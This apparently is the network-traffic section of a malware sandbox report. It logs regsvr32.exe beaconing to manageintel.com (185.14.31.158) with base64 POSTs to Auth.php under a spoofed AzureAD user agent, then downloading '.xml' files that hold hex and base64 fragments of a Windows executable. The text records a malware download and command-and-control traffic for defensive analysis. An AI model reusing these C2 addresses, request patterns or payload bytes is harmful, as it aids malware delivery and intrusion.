auth=eyIzbTd4IjoiVXJ0bythRT0iLCJhdTVvIjoiY2JrMzlxM1MwQmhSUzBnRUtGSEVCUTBMMFpaNEtQNEpXNW9ZU2ErUFNmTE4za1JUIiwiY0JGIjoiVnB3bzF2dlA5MmhSUWh3YWV6amRkSHM9IiwiZTAzZWQiOiJVT1ZaeDZhTTBVVUxDWFprTUErbmZtZ095S2c0ZWE5WFROQk5TZUxUQ2ZZPSIsInRiZXNxbiI6IlJLVnIwUT09Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0ifQ==
Jan 30, 2022 13:43:47.856467009 CET	12444	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:50 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49840	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:43:47.909421921 CET	12445	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiVXJ0bythRT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:43:48.152194977 CET	12446	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:50 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49831	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:43:16 UTC	0	OUT	GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:43:16 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:18 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:25:50 GMT ETag: "240c8-5d4dd3c71c40d" Accept-Ranges: bytes Content-Length: 147656 Connection: close Content-Type: application/xml
2022-01-30 12:43:16 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ac 19 b5 31 e8 78 db 62 e8 78 db 62 e8 78 db 62 fc 13 d8 63 e2 78 db 62 fc 13 de 63 60 78 db 62 fc 13 df 63 fa 78 db 62 ba 0d de 63 cd 78 db 62 ba 0d df 63 e7 78 db 62 ba 0d d8 63 fa 78 db 62 fc 13 da 63 f9 78 db 62 e8 78 da 62 90 78 db 62 b0 0d de 63 ec 78 db 62 b0 0d db 63 e9 78 db 62 b0 0d d9 63 e9 78 db 62 52 69 63 68 e8 78 db 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1xbxbxbcxbc`xbcxbcxbcxbcxbcxbxbxbcxbcxbcxbRichxb
2022-01-30 12:43:16 UTC	8	IN	Data Raw: 00 00 8b f8 6a 00 6a 01 8b 55 f8 52 8b 45 f4 50 e8 76 66 00 00 8b 4d fc 8a 14 3e 88 14 01 eb a7 8b 45 fc 5f 5e 8b e5 5d c2 04 00 55 8b ec 83 ec 0c 56 57 89 4d fc 8b 45 fc c6 40 15 01 0f 57 c0 66 0f 13 45 f4 eb 12 8b 4d f4 83 c1 01 8b 55 f8 83 d2 00 89 4d f4 89 55 f8 83 7d f8 00 77 41 72 06 83 7d f4 15 73 39 8b 4d 08 e8 5c 4d 00 00 8b f0 6a 00 6a 01 8b 45 f8 50 8b 4d f4 51 e8 09 66 00 00 8b f8 6a 00 6a 01 8b 55 f8 52 8b 45 f4 50 e8 f6 65 00 00 8b 4d fc 8a 14 3e 88 14 01 eb a7 8b 45 fc 5f 5e 8b e5 5d c2 04 00 55 8b ec 83 ec 0c 56 57 89 4d fc 8b 45 fc c6 40 1f 01 0f 57 c0 66 0f 13 45 f4 eb 12 8b 4d f4 83 c1 01 8b 55 f8 83 d2 00 89 4d f4 89 55 f8 83 7d f8 00 77 41 72 06 83 7d f4 1f 73 39 8b 4d 08 e8 dc 4c 00 00 8b f0 6a 00 6a 01 8b 45 f8 50 8b 4d f4 51 e8 89 Data Ascii: jjUREPvfM>E_^]UVWME@WfEMUMU}wAr}s9M\MjjEPMQfjjUREPeM>E_^]UVWME@WfEMUMU}wAr}s9MLjjEPMQ
2022-01-30 12:43:16 UTC	24	IN	Data Raw: 4d fc 8b e5 5d c2 04 00 cc cc cc 55 8b ec 8b 45 08 50 e8 05 23 00 00 83 c4 04 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 ff 15 44 50 01 10 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 89 4d fc 8b 4d fc e8 5f 19 00 00 89 45 f8 8b 45 fc 8b 48 14 89 4d f4 8b 55 f8 52 8b 45 f4 50 8b 4d 08 51 e8 12 00 00 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 08 83 c8 0f 89 45 fc 8b 4d fc 3b 4d 10 76 05 8b 45 10 eb 2e 8b 55 0c d1 ea 8b 45 10 2b c2 39 45 0c 76 05 8b 45 10 eb 1a 8b 4d 0c d1 e9 03 4d 0c 89 4d f8 8d 55 f8 52 8d 45 fc 50 e8 78 bb ff ff 8b 00 8b e5 5d c2 0c 00 55 8b ec 83 ec 10 89 4d f8 8b 4d f8 e8 7f 0a 00 00 89 45 fc 8b 4d f8 e8 24 19 00 00 89 45 f4 8b 45 fc d1 e8 Data Ascii: M]UEP#]UEPMQURDP]UMM_EEHMUREPMQ]UEEM;MvE.UE+9EvEMMMUREPx]UMMEM$EE
2022-01-30 12:43:16 UTC	40	IN	Data Raw: 75 f0 83 c4 08 8b 45 08 8b 4d 0c 8b d0 e8 d9 12 00 00 8b 45 0c 39 78 0c 74 12 68 24 c0 01 10 56 8b d7 8b c8 e8 e2 12 00 00 8b 45 0c 56 ff 75 f8 89 58 0c e8 73 fe ff ff 8b 4d ec 83 c4 08 8b d6 8b 49 08 e8 83 12 00 00 cc 6a 08 68 a8 a6 01 10 e8 26 ee ff ff 8b 45 08 85 c0 74 7e 81 38 63 73 6d e0 75 76 83 78 10 03 75 70 81 78 14 20 05 93 19 74 12 81 78 14 21 05 93 19 74 09 81 78 14 22 05 93 19 75 55 8b 48 1c 85 c9 74 4e 8b 51 04 85 d2 74 29 83 65 fc 00 52 ff 70 18 e8 4a 00 00 00 c7 45 fc fe ff ff ff eb 31 ff 75 0c ff 75 ec e8 43 00 00 00 59 59 c3 8b 65 e8 eb e4 f6 01 10 74 19 8b 40 18 8b 08 85 c9 74 10 8b 01 51 8b 70 08 8b ce ff 15 b8 51 01 10 ff d6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec 8b 4d 08 ff 55 0c 5d c2 08 00 55 8b ec 80 7d 0c 00 74 Data Ascii: uEME9xth$VEVuXsMIjh&Et~8csmuvxupx tx!tx"uUHtNQt)eRpJE1uuCYYet@tQpQMdY_^[UMU]U}t
2022-01-30 12:43:16 UTC	56	IN	Data Raw: 0c 75 11 6a 01 8b ce e8 fa 05 00 00 85 c0 0f 85 81 00 00 00 8b 46 08 88 18 eb cf 53 53 53 53 6a ff 56 53 ff 75 14 e8 95 11 00 00 83 c4 20 85 c0 75 16 ff 15 78 50 01 10 50 e8 14 e9 ff ff 59 e8 44 e9 ff ff 8b 00 eb 4d 57 8b 7d 0c 3b 47 0c 76 0c 50 8b cf e8 ad 05 00 00 85 c0 75 37 53 53 ff 77 0c ff 77 08 6a ff 56 53 ff 75 14 e8 4f 11 00 00 83 c4 20 85 c0 75 16 ff 15 78 50 01 10 50 e8 ce e8 ff ff 59 e8 fe e8 ff ff 8b 00 eb 06 48 89 47 10 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 51 ff 75 10 8d 45 ff 50 ff 75 0c ff 75 08 e8 67 fe ff ff 83 c4 10 c9 c3 8b ff 55 8b ec 8b 45 0c 83 ec 28 56 85 c0 75 14 e8 bd e8 ff ff 6a 16 5e 89 30 e8 95 d6 ff ff e9 bb 01 00 00 8b 75 08 53 33 db 57 89 18 8b fb 8b 06 8b cb 89 7d d8 89 4d dc 89 5d e0 85 c0 74 61 8d 4d fc 66 c7 45 fc 2a 3f Data Ascii: ujFSSSSjVSu uxPPYDMW};GvPu7SSwwjVSuO uxPPYHG3_^[]UQuEPuugUE(Vuj^0uS3W}M]taMfE*?
2022-01-30 12:43:16 UTC	72	IN	Data Raw: 00 7f 0b 66 0f d6 4c 24 04 dd 44 24 04 c3 66 0f 2e ff 7b 24 ba ec 03 00 00 83 ec 10 89 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 29 0a 00 00 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 a0 92 01 10 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 e0 92 01 10 c3 66 0f c2 1d c0 92 01 10 06 66 0f 54 1d a0 92 01 10 66 0f d6 5c 24 04 dd 44 24 04 c3 8b ff 55 8b ec 8b 4d 08 33 c0 38 01 74 0c 3b 45 0c 74 07 40 80 3c 08 00 75 f4 5d c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 e8 92 01 10 ff 15 54 50 01 10 a3 60 c8 01 10 c3 8b 0d 60 c8 01 10 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 c8 01 10 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 c8 01 10 83 f8 ff 74 0c 83 f8 fe Data Ascii: fL$D$f.{$T$T$T$$)D$~D$ff(f=\|%=2fTXfL$D$ffTf\$D$UM38t;Et@<u]3PPjPjh@hTP``u`3`t
2022-01-30 12:43:16 UTC	88	IN	Data Raw: cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~
2022-01-30 12:43:16 UTC	104	IN	Data Raw: 61 6c 69 7a 65 00 00 70 01 4f 6c 65 49 6e 69 74 69 61 6c 69 7a 65 00 6f 6c 65 33 32 2e 64 6c 6c 00 07 01 53 48 53 74 72 44 75 70 41 00 08 01 53 48 53 74 72 44 75 70 57 00 c5 00 53 48 47 65 74 54 68 72 65 61 64 52 65 66 00 00 53 48 4c 57 41 50 49 2e 64 6c 6c 00 18 02 55 75 69 64 43 72 65 61 74 65 00 00 0b 00 44 63 65 45 72 72 6f 72 49 6e 71 54 65 78 74 41 00 00 9c 01 52 70 63 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 52 50 43 52 54 34 2e 64 6c 6c 00 00 89 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 82 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 b1 05 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 71 05 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 Data Ascii: alizepOleInitializeole32.dllSHStrDupASHStrDupWSHGetThreadRefSHLWAPI.dllUuidCreateDceErrorInqTextARpcExceptionFilterRPCRT4.dllIsProcessorFeaturePresentIsDebuggerPresentUnhandledExceptionFilterqSetUnhandledExceptionF
2022-01-30 12:43:16 UTC	120	IN	Data Raw: 00 64 00 65 00 4e 00 61 00 6d 00 65 00 00 00 20 00 00 00 52 00 75 00 6e 00 74 00 69 00 6d 00 65 00 5f 00 6d 00 73 00 65 00 63 00 73 00 00 00 54 45 4d 50 40 02 00 00 04 00 00 00 04 00 00 00 90 1c 00 00 01 00 00 00 9c 00 ae 6f d3 e6 ed 51 8d d4 a6 47 39 64 67 b9 0f 01 01 00 01 ff ff 42 01 00 00 44 82 09 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 61 00 00 00 02 41 ff ff 41 00 00 00 8a 6f 04 00 44 00 61 00 74 00 61 00 00 00 29 00 00 00 06 4b 95 04 00 4e 00 61 00 6d 00 65 00 00 00 05 01 0b 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 43 00 6f 00 64 00 65 00 02 0d 00 00 08 04 41 ff ff 49 00 00 00 8a 6f 04 00 44 00 61 00 74 00 61 00 00 00 31 00 00 00 06 4b 95 04 00 4e 00 61 00 6d 00 65 00 00 00 05 01 0f 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 43 00 Data Ascii: deName Runtime_msecsTEMP@oQG9dgBDEventDataAAoData)KNameControlCodeAIoData1KNameControlC
2022-01-30 12:43:16 UTC	136	IN	Data Raw: 86 48 86 f7 0d 01 01 0c 05 00 03 82 01 01 00 12 bf a1 ef 8b 74 9a 98 44 b8 69 46 b5 ab 24 0a 0c a4 8a 67 b8 3a 81 bf 45 8a 7d 52 07 a8 8d 1f 4e 21 85 39 a3 6b 5e 2d 20 86 bf 10 b8 ae 79 3b 53 cd b4 fb d8 44 be 06 d9 5c 63 67 d4 40 16 87 44 86 72 2a d6 32 15 f5 12 83 c2 f9 e1 5d 11 40 67 f6 42 27 72 c5 23 e2 02 38 1a 4c 20 e2 db 01 f7 cd 46 4f 26 a2 7c 66 c0 51 36 b6 89 02 54 c7 fc 58 fb 6c 00 ee fe 98 a6 2e 95 a1 0c 53 29 1f 6f d8 19 a6 4f 9e f7 ac 09 ea 5d 82 c6 8b af 80 a7 bd 81 48 52 84 31 da 32 ec 15 e4 a6 4c 3d 6c 39 73 d4 0b 85 39 20 e0 85 1a 68 e1 a7 48 38 a9 d1 36 25 77 c1 8d 19 16 c5 88 4c 66 7d 2f 63 ce 98 e8 69 df ac 3c a8 5d 9d c9 1c 5b ae d8 f3 2f 74 cf b8 7e f6 d7 83 9d 11 96 62 9a ae 45 13 da 7f dc 47 fb df c3 52 9f e6 06 55 e9 9d 8c f2 3a Data Ascii: HtDiF$g:E}RN!9k^- y;SD\cg@Dr*2]@gB'r#8L FO&\|fQ6TXl.S)oO]HR12L=l9s9 hH86%wLf}/ci<][/t~bEGRU:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49833	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:43:17 UTC	144	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:43:17 UTC	144	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:20 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT ETag: "ab044-5d4dd04921d60" Accept-Ranges: bytes Content-Length: 700484 Connection: close Content-Type: application/xml
2022-01-30 12:43:17 UTC	144	IN	Data Raw: 49 41 4c 6a 51 57 73 79 56 30 35 54 51 67 41 41 2f 2f 38 41 41 4c 49 41 41 41 41 50 41 41 41 41 4c 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 41 41 41 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 45 41 41 41 51 66 75 67 34 50 74 41 6e 4e 54 4f 42 79 44 61 55 54 41 79 59 2b 4d 53 42 77 63 6d 39 6e 63 6d 74 74 49 47 4e 75 62 6d 35 76 0d 0a 47 58 67 52 4a 45 68 41 49 69 42 33 4b 32 34 67 52 45 39 54 49 47 64 76 5a 47 55 68 44 51 30 4b 53 56 68 7a 51 57 67 79 56 30 35 6f 63 72 72 75 65 31 48 55 76 58 46 52 31 4c 31 30 55 64 53 39 0d 0a 41 6d 4b 6b 2f 52 35 6a 67 2f 4d 34 65 4e 47 38 32 31 48 55 76 57 55 36 30 4c 78 69 55 64 53 39 52 48 79 6a 2f 52 78 6a 67 2f 4e 2b 5a 74 65 38 62 46 48 55 76 53 4d 6b 30 Data Ascii: IALjQWsyV05TQgAA//8AALIAAAAPAAAALVhzQWgyV05XQgAAAAAAAAoAAAAPAAAAbVhzQWgyV05XQgAAAAEAAAQfug4PtAnNTOByDaUTAyY+MSBwcm9ncmttIGNubm5vGXgRJEhAIiB3K24gRE9TIGdvZGUhDQ0KSVhzQWgyV05ocrrue1HUvXFR1L10UdS9AmKk/R5jg/M4eNG821HUvWU60LxiUdS9RHyj/Rxjg/N+Zte8bFHUvSMk0
2022-01-30 12:43:17 UTC	152	IN	Data Raw: 77 78 30 41 4c 41 41 41 41 0d 0a 62 54 4a 79 79 69 58 43 33 45 65 2f 30 5a 55 43 41 49 74 56 38 49 4e 43 42 4d 64 4b 2f 41 45 41 62 56 6a 34 42 48 43 37 45 71 62 63 44 78 53 4a 54 65 53 4c 56 52 71 4a 56 65 43 45 52 66 43 4c 0d 0a 4a 56 7a 77 67 48 69 37 47 71 4c 63 46 2b 79 4a 56 64 79 4c 52 65 4a 51 69 30 33 72 55 59 74 56 6a 51 72 34 42 4c 52 69 33 41 4f 6e 79 52 46 53 36 41 64 31 41 41 71 4c 52 66 43 45 53 41 53 4a 0d 0a 49 49 44 34 46 4c 43 37 41 70 72 63 42 39 53 4a 52 64 43 4c 54 64 71 4a 54 63 79 43 56 51 79 4a 4f 4a 44 34 42 4b 53 35 47 6f 62 63 55 34 6b 51 69 30 58 77 69 30 49 45 67 38 45 4c 69 55 33 45 0d 0a 35 67 32 33 79 44 33 79 33 41 75 58 79 30 57 38 69 30 32 38 69 55 65 34 6a 56 55 44 69 56 57 30 35 68 33 4c 79 69 57 47 33 46 2f 65 55 6f Data Ascii: wx0ALAAAAbTJyyiXC3Ee/0ZUCAItV8INCBMdK/AEAbVj4BHC7EqbcDxSJTeSLVRqJVeCERfCLJVzwgHi7GqLcF+yJVdyLReJQi03rUYtVjQr4BLRi3AOnyRFS6Ad1AAqLRfCESASJIID4FLC7AprcB9SJRdCLTdqJTcyCVQyJOJD4BKS5GobcU4kQi0Xwi0IEg8ELiU3E5g23yD3y3AuXy0W8i028iUe4jVUDiVW05h3LyiWG3F/eUo
2022-01-30 12:43:17 UTC	168	IN	Data Raw: 35 64 61 56 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 50 4e 6d 66 34 57 67 79 56 78 30 42 46 59 6c 6c 38 49 6c 4e 36 49 46 46 36 49 6c 4b 70 49 74 4e 0d 0a 79 64 45 2b 37 65 4e 6e 76 38 63 43 68 6f 74 46 78 49 6c 46 32 49 46 4e 78 49 50 4f 42 49 6c 4e 75 64 4d 6d 6d 65 4e 33 58 32 56 56 67 2f 67 45 69 55 58 67 69 30 66 55 69 31 58 58 69 77 45 72 0d 0a 62 35 6d 4c 52 65 46 33 34 38 55 61 71 6f 6c 4e 6f 49 74 56 6f 49 4f 56 56 50 2f 77 2f 38 64 46 72 61 65 4d 76 6d 66 31 45 74 4b 6f 76 66 39 2f 69 30 57 63 69 55 2b 38 69 30 33 50 4f 30 32 38 0d 0a 48 6c 44 2b 46 4b 69 37 41 76 61 38 52 49 31 46 76 49 6c 46 75 49 46 4e 75 49 6c 43 6d 49 74 56 39 64 45 6d 31 65 4e 33 77 38 56 66 79 30 32 51 69 31 57 30 4f 31 2b 51 64 51 58 6e 6a 32 Data Ascii: 5daV0lRUmShAAAAAFpkiSUPAAAAPNmf4WgyVx0BFYll8IlN6IFF6IlKpItNydE+7eNnv8cChotFxIlF2IFNxIPOBIlNudMmmeN3X2VVg/gEiUXgi0fUi1XXiwErb5mLReF348UaqolNoItVoIOVVP/w/8dFraeMvmf1EtKovf9/i0WciU+8i03PO028HlD+FKi7Ava8RI1FvIlFuIFNuIlCmItV9dEm1eN3w8Vfy02Qi1W0O1+QdQXnj2
2022-01-30 12:43:17 UTC	184	IN	Data Raw: 31 2b 67 55 75 69 33 78 41 4d 41 37 70 78 2f 79 69 33 61 56 41 74 48 51 55 55 59 69 55 57 63 69 30 66 63 4b 30 30 66 67 38 45 42 0d 0a 50 4e 4d 6d 39 57 74 6e 52 78 7a 63 42 35 78 51 36 49 2f 45 41 77 71 44 78 41 79 45 54 65 79 4a 49 4d 44 34 46 50 43 37 41 74 72 63 42 35 53 4a 52 5a 43 4e 54 64 71 4a 54 59 79 45 56 5a 43 4c 0d 0a 4b 4e 54 34 53 65 45 34 33 41 75 7a 79 55 33 30 5a 49 6b 4e 41 41 6f 41 41 49 76 71 58 63 49 55 62 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 71 2f 32 67 67 42 51 77 51 5a 4b 45 50 41 41 41 41 0d 0a 50 54 7a 36 5a 47 67 79 56 30 37 55 72 6d 53 4a 54 65 53 4c 52 65 36 4a 52 65 79 45 54 65 79 4c 50 45 6a 36 46 4c 53 35 47 71 71 2f 65 53 30 44 41 43 74 46 33 44 46 46 43 48 4d 4b 36 50 34 79 0d 0a 62 31 6a 34 42 4c 51 78 45 6b 62 65 Data Ascii: 1+gUui3xAMA7px/yi3aVAtHQUUYiUWci0fcK00fg8EBPNMm9WtnRxzcB5xQ6I/EAwqDxAyETeyJIMD4FPC7AtrcB5SJRZCNTdqJTYyEVZCLKNT4SeE43AuzyU30ZIkNAAoAAIvqXcIUbZS/jaT+m4ICyexq/2ggBQwQZKEPAAAAPTz6ZGgyV07UrmSJTeSLRe6JReyETeyLPEj6FLS5Gqq/eS0DACtF3DFFCHMK6P4yb1j4BLQxEkbe
2022-01-30 12:43:17 UTC	200	IN	Data Raw: 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 2b 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 43 4e 2f 62 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c 69 55 33 30 35 67 32 48 79 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 6d 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 44 4e 2b 37 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c Data Ascii: i3K3ERsCgh0FItVCINV8ItK8FCLIKSb+PfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYCN/bGoy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8ELiU305g2Hyi3K3ERsCgh0FItVCINV8ItK8FCLIKSbmPfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYDN+7Goy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8EL
2022-01-30 12:43:17 UTC	216	IN	Data Raw: 6b 65 6f 69 45 33 71 44 37 5a 56 0d 0a 69 4e 32 68 54 75 77 6b 56 6b 35 58 7a 30 58 4d 69 59 55 63 2f 2f 58 2f 69 30 33 2f 67 38 45 45 35 4e 56 58 76 70 66 4e 37 55 70 58 51 67 42 72 77 76 2b 4c 6a 53 37 2f 2f 2f 38 4d 51 51 53 4a 0d 0a 36 48 69 4d 76 70 65 35 77 6d 36 6f 76 66 2b 4c 41 6f 74 49 43 49 4f 4e 46 50 2f 77 2f 34 75 56 63 61 65 4d 76 75 47 6e 54 37 47 6f 76 59 75 46 47 50 2f 2f 2f 31 71 4c 6a 52 54 77 2f 2f 2f 6f 0d 0a 41 59 75 4d 76 71 35 33 73 30 2f 63 44 2f 43 44 77 51 53 4a 6a 52 72 2f 2f 2f 2b 31 42 41 41 41 62 54 4f 78 76 75 4f 2f 52 37 47 6f 76 51 4e 42 42 49 6d 46 44 50 58 2f 2f 34 75 61 44 50 2f 2f 0d 0a 6b 74 4e 78 79 69 41 36 33 73 4f 4c 76 50 2f 2f 69 35 58 63 2f 76 58 2f 69 5a 55 4c 2f 2f 2f 2f 31 55 68 7a 51 57 68 5a 6e 37 48 63 Data Ascii: keoiE3qD7ZViN2hTuwkVk5Xz0XMiYUc//X/i03/g8EE5NVXvpfN7UpXQgBrwv+LjS7///8MQQSJ6HiMvpe5wm6ovf+LAotICIONFP/w/4uVcaeMvuGnT7GovYuFGP///1qLjRTw///oAYuMvq53s0/cD/CDwQSJjRr///+1BAAAbTOxvuO/R7GovQNBBImFDPX//4uaDP//ktNxyiA63sOLvP//i5Xc/vX/iZUL////1UhzQWhZn7Hc
